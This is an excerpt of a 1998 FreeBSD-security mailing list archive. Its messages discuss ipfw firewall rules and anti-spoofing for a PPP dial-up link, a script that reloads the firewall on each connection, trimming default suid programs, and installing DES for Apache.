Subject: Re: ipfw with ppp -alias setup References: <199807040158.UAA20374@sunra.csci.unt.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On my home FreeBSD box, I use ipfw filters as well. Instead of running rc.firewall every time I connect to my ISP, I use the /etc/ppp/ppp.linkup to execute my own custom ipfw script for me automatically. Here's what I've been using in /etc/ppp/ppp.linkup: MYADDR: delete ALL add 0 0 HISADDR ! sh -c "/bin/sh /etc/rc.firewall &" I've basicall gutted rc.firewall and rewrote many parts for my own setup. I use ppp.linkup to execute it every time I establish a connection to my ISP. Near the top of my custom rc.firewall script is this: ip=`/usr/bin/netstat -in | perl -ne 'print $1 if ( /^tun0\s+[0-9]+\s+[0-9\.]+\s+([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\s+/ );'` (I hope my mail program doesn't wrap the perl expression line -- it is rather long) It basically runs the 'netstat -in' command and then looks at the output for a line like: tun0 1500 10.2.6 10.2.6.112 0 0 0 0 0 Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Coll The perl expression grabs the IP address (in the above line that would be '10.2.6.112') and spits it back out to be assigned to the 'ip' shell script variable, which I use extensively later on in my own rc.firewall script. Every time my modem connects, my firewall setup is automatically reset and updated for my new IP address. I haven't tried to see if it is possible to pass MYADDR as a parameter to the script in /etc/ppp/ppp.linkup. That might work too, but since I have a working setup for now, I haven't been motivated to change things to find out. I don't know if this is of any use to you in your situation, esp. since you mentioned that this sort of thing is not what you were looking for or asking. Aaron out. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat Jul 4 04:43:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA23552 for freebsd-security-outgoing; Sat, 4 Jul 1998 04:43:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA23544 for ; Sat, 4 Jul 1998 04:42:57 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from smack.my.bitch.up.fast.net.uk (ssmack.smack.smack.smack.smack.smack.smack.smack.smack.smack.fast.net.uk [194.207.104.143]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id MAA03065 for ; Sat, 4 Jul 1998 12:42:29 +0100 (BST) Received: from localhost (localhost [127.0.0.1]) by smack.my.bitch.up.fast.net.uk (8.8.8/8.8.8) with SMTP id MAA00853 for ; Sat, 4 Jul 1998 12:32:10 GMT (envelope-from netadmin@fastnet.co.uk) Date: Sat, 4 Jul 1998 12:31:54 +0000 (GMT) From: Jay Tribick X-Sender: netadmin@smack.my.bitch.up.fast.net.uk To: freebsd-security@FreeBSD.ORG Subject: Increasing security by decreasing installed programs Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all.. I think we all need to look closely at the default-installed suid/sgid programs. Why, by default, does FreeBSD install uucp*? There's not /that/ many people who use it and it would be much better as an optional components, especially as it runs suid/sgid. Why not make the installation program let you select defaultly installed suid binaries individually (instead of just selecting the basic distribution, let us go one level down and select individual basic packages)? Regards, Jay Tribick [| Network Administrator | FastNet International | http://fast.net.uk/ |] [| PGPv5 RSA Key Available [2047bit] | Finger netadmin@fastnet.co.uk |] [| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |] [| ----={ PGPv5 Fingerprint := FA690E7762F0E62F38C6052CC387FFF3 }=---- |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat Jul 4 19:14:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA09044 for freebsd-security-outgoing; Sat, 4 Jul 1998 19:14:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sunra.csci.unt.edu (sunra.csci.unt.edu [129.120.3.43]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA09017 for ; Sat, 4 Jul 1998 19:14:01 -0700 (PDT) (envelope-from louie@sunra.csci.unt.edu) Received: (from louie@localhost) by sunra.csci.unt.edu (8.8.7/8.8.7) id VAA22240; Sat, 4 Jul 1998 21:08:32 -0500 (CDT) (envelope-from louie) Date: Sat, 4 Jul 1998 21:08:32 -0500 (CDT) From: Louie Message-Id: <199807050208.VAA22240@sunra.csci.unt.edu> To: jkb@best.com, louie@sunra.csci.unt.edu Subject: Re: ipfw with ppp -alias setup Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 3 Jul 1998, Jan B. Koum wrote: > ># ipfw list > >01000 allow ip from any to any via lo0 > >01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8 > >01110 deny log ip from 192.168.0.0/16 to any in recv tun0 > ^^^^^^ > > Aren't you using 192.168.1.0/16 as you mentioned above? Yes, but I'm blocking 192.168.1.0/16 from coming in on the PPP side. Spoof prevention. > >01210 deny log ip from 172.16.0.0/12 to any in recv tun0 > >01310 deny log ip from 10.0.0.0/8 to any in recv tun0 > >01410 allow tcp from any to any in recv tun0 established > >01510 deny log tcp from any to any in recv tun0 setup > >01610 allow tcp from any to any out xmit tun0 > >01710 allow tcp from any to any via ed0 > >01810 allow udp from any 53 to any > >01910 allow udp from any to any 53 > >02010 allow icmp from any to any icmptype 0 > >02110 allow icmp from any to any icmptype 3 > >02210 allow icmp from any to any icmptype 8 > >02310 allow icmp from any to any icmptype 11 > >65535 deny ip from any to any > > I'd also do: > ipfw add 65534 deny log ip from any to any I like this. Thanks. > This way if you will see something not working you will have a > log to debug. For example, your ftp will not work -- you'll have to use > passive ftp. Else you gonna see server trying to connect to your port > 40000+ (if I remember correctly) from it's port 20. If you dont' wan't to > use passive ftp, then > > ipfw add 1509 allow tcp from any 20 to any 40000-40100 in recv tun0 > ^^^^ > > Notice how it should be before 1510. Also, you have to add > incoming port and not just "... from any 20 to any" since if I am root, I > can claim to be from port 20. :) Since it's just me on the inside, I don't mind having to use passive mode. > AFAICT the rules look ok. Really paranoid people might just take > out icmp (think Phrack issue 51 article 6). But yeah, everything looks > fine. Add the "deny log" rule before last one if you want. I'll have to check that out. > I am sure if I missed something people here will correct me. I'm sure they will. :) > -- Yan > > Jan Koum jkb@best.com | "Turn up the lights; I don't want > www.FreeBSD.org -- The Power to Serve | to go home in the dark." > ---------------------------------------+----------------------------------- > ICMP: What happens when you hack into a military network and they catch you. Louie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat Jul 4 19:22:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA09881 for freebsd-security-outgoing; Sat, 4 Jul 1998 19:22:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (jkb@shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA09871 for ; Sat, 4 Jul 1998 19:22:47 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id TAA22217; Sat, 4 Jul 1998 19:22:48 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Sat, 4 Jul 1998 19:22:47 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Louie cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw with ppp -alias setup In-Reply-To: <199807050208.VAA22240@sunra.csci.unt.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 4 Jul 1998, Louie wrote: >On Fri, 3 Jul 1998, Jan B. Koum wrote: > >> ># ipfw list >> >01000 allow ip from any to any via lo0 >> >01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8 >> >01110 deny log ip from 192.168.0.0/16 to any in recv tun0 >> ^^^^^^ >> >> Aren't you using 192.168.1.0/16 as you mentioned above? > >Yes, but I'm blocking 192.168.1.0/16 from coming in on the PPP side. >Spoof prevention. > Well.. spoofed packets will try to pretend that they are coming from your computer. So, in reality you don't need rule 1210, 1310 and above 1110, but instead only need 192.168.1.0/24 since that is what one would try to spoof with. >> >01210 deny log ip from 172.16.0.0/12 to any in recv tun0 >> >01310 deny log ip from 10.0.0.0/8 to any in recv tun0 >> >01410 allow tcp from any to any in recv tun0 established > >> AFAICT the rules look ok. Really paranoid people might just take >> out icmp (think Phrack issue 51 article 6). But yeah, everything looks >> fine. Add the "deny log" rule before last one if you want. > >I'll have to check that out. Do that. :) Also do note that this type of data tunneling can be done with protocols other then icmp. -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat Jul 4 21:04:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA17217 for freebsd-security-outgoing; Sat, 4 Jul 1998 21:04:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.serve.com (mail.serve.com [207.8.152.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA17212 for ; Sat, 4 Jul 1998 21:04:20 -0700 (PDT) (envelope-from numard@smartmedia.com.ar) Received: from smartmedia.com.ar ([203.111.0.219]) by mail.serve.com (8.8.7/8.8.7) with ESMTP id AAA24725 for ; Sun, 5 Jul 1998 00:03:37 -0400 Message-ID: <359EFB36.A4760DD@smartmedia.com.ar> Date: Sun, 05 Jul 1998 14:04:06 +1000 From: "Numard (Norberto Meijome)" Organization: 0xCode X-Mailer: Mozilla 4.05 [en] (WinNT; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: URGENT!!! DES only for Apache, consequences? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org PLEASE, CC DIRECTLY TO ME SINCE I'm NOT IN THIS LIST, THX! Hi! i've to install the des library to make apache 1.3 + frontpage extensions work. Now, the only way to do this AFAIK,is do a /stand/sysinstall??? isn't that like a whole new install? anyway, i'd like to modify only the crypt lib ONLY for apache and FP, and leave the rest running and humming like it is now. The server is in USA. But i'm working from a remote location through telnet sessions. Any chance to be locked out? TIA! -- Norberto Meijome (a) Numard, (a) Beto | ICQ # 15032073 * Contrary to popular belief, Unix is user friendly. It just happens to be very selective about who it decides to make friends with. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message